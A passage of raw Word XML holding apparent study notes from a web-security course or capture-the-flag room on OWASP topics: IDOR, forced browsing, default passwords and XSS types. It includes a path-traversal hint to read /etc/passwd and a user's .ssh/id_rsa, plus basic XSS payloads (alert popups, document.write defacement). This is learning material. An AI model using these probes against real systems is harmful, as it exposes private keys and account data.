          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Swap /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd for /home/falcon/ .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to search for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CEFB3C" w14:textId="4286EFA0" w:rsidR="007703A4" w:rsidRPr="0084205E" w:rsidRDefault="007703A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA396A1" w14:textId="484357B8" w:rsidR="007703A4" w:rsidRPr="0084205E" w:rsidRDefault="007703A4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">If  </w:t>
      </w:r>
      <w:r w:rsidR="00234FBF" w:rsidRPr="0084205E">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00234FBF" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> websites visitor is able to access the protected page/pages not authorized to view, access controls are broken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88F972" w14:textId="6DF7644A" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application uses unverified data in SQL call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF561B" w14:textId="00FB54FD" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pstmt.setString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">(1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>request.getParamter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(“acct”));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F82043" w14:textId="4035C4EC" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ResultSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> results = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>pstmt.executeQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D06C9F" w14:textId="05DC18F1" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Modify acct parameter in the browser to query any account number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B583DB" w14:textId="20905E0A" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Force </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>browse</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to target URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D746B64" w14:textId="0E1027F3" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00234FBF" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/app/getappInfo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08650027" w14:textId="18332AAA" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00234FBF" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/app/admin_getappInfo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00F816B6" w14:textId="578FC92C" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Broken Access Control (IDOR Challenge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42256F8F" w14:textId="5DD262A6" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Insecure Direct Object Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F5A23" w14:textId="633B78B1" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00234FBF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Exploiting a misconfiguration in the way user input is handled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91F716" w14:textId="0E1ACB05" w:rsidR="00234FBF" w:rsidRPr="0084205E" w:rsidRDefault="00625709" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Flag=&lt;num&gt; after .php in website URL following account login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EB27F4" w14:textId="3745BF3A" w:rsidR="00625709" w:rsidRPr="0084205E" w:rsidRDefault="00625709" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5D9AF" w14:textId="51E725E9" w:rsidR="00625709" w:rsidRPr="0084205E" w:rsidRDefault="00625709" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Poorly configured permissions on cloud services, unnecessary features enabled, default accounts with unchanged passwords, overly detailed error messages, no HTTP security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA64B97" w14:textId="3065DB65" w:rsidR="00625709" w:rsidRPr="0084205E" w:rsidRDefault="00625709" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Default Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D9F602" w14:textId="2AE66E0A" w:rsidR="00625709" w:rsidRPr="0084205E" w:rsidRDefault="00625709" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common in embedded and IoT devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651849B3" w14:textId="73EAF679" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check official documentation, OSINT-style (google)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE7F7D" w14:textId="37D60A26" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Cross-site Scripting</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29502E3F" w14:textId="61FFEDF9" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XSS Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325960AB" w14:textId="4A4741DB" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Typically found in web application – type of injection that allows attackers to execute malicious scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB63CB6" w14:textId="27279FC8" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Vulnerable if it uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> user input – possible in JS, VBScript, Flash and CSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36298589" w14:textId="310EEBF8" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stored XSS – most dangerous type – malicious string originates from website database – often happens when a website allows user input that is not sanitized when inserted into database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247F4E2E" w14:textId="2274ED34" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Reflected XSS – part of the victims </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to the website. Website includes payload in response back to the user. Attacker needs to trick a victim into clicking a URL to execute their malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABCA35A" w14:textId="2A95273D" w:rsidR="009A239E" w:rsidRPr="0084205E" w:rsidRDefault="009A239E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>DOM-Based XSS – Document Object Model</w:t>
      </w:r>
      <w:r w:rsidR="00750162" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – programming interface for HTML and XML documents – represents the page so programs can change document structure, style, content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F0AE1" w14:textId="2CA08EF2" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00750162" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>XSS Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA92676" w14:textId="7400FCD3" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00750162" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Popup's (&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Hello World”)&lt;/script&gt;) - Creates a Hello World message popup on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>a users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F01EDD" w14:textId="0917ACA6" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00E65DE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>alert“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00750162" w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>window.location.hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C470237" w14:textId="7E86A173" w:rsidR="00E65DE6" w:rsidRPr="0084205E" w:rsidRDefault="00E65DE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REFLECTIVE USE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20352EEC" w14:textId="0DECADE5" w:rsidR="00750162" w:rsidRPr="0084205E" w:rsidRDefault="00750162" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Writing HTML (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>) - Override the website's HTML to add your own (essentially defacing the entire page).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD7DA12" w14:textId="0521BF9B" w:rsidR="00E65DE6" w:rsidRPr="0084205E" w:rsidRDefault="00E65DE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Once account is registered and comments are allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC05DF8" w14:textId="24FC0445" w:rsidR="00E65DE6" w:rsidRPr="0084205E" w:rsidRDefault="00E65DE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Use HTML brackets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA97ACA" w14:textId="4BC08BA5" w:rsidR="00E65DE6" w:rsidRPr="0084205E" w:rsidRDefault="00E65DE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ex. &lt;h3&gt;HELLO&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0226AB" w14:textId="502F3880" w:rsidR="00E65DE6" w:rsidRPr="0084205E" w:rsidRDefault="00E65DE6" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>STORED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9756F9" w14:textId="607A2B67" w:rsidR="00E65DE6" w:rsidRPr="0084205E" w:rsidRDefault="00D74383" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
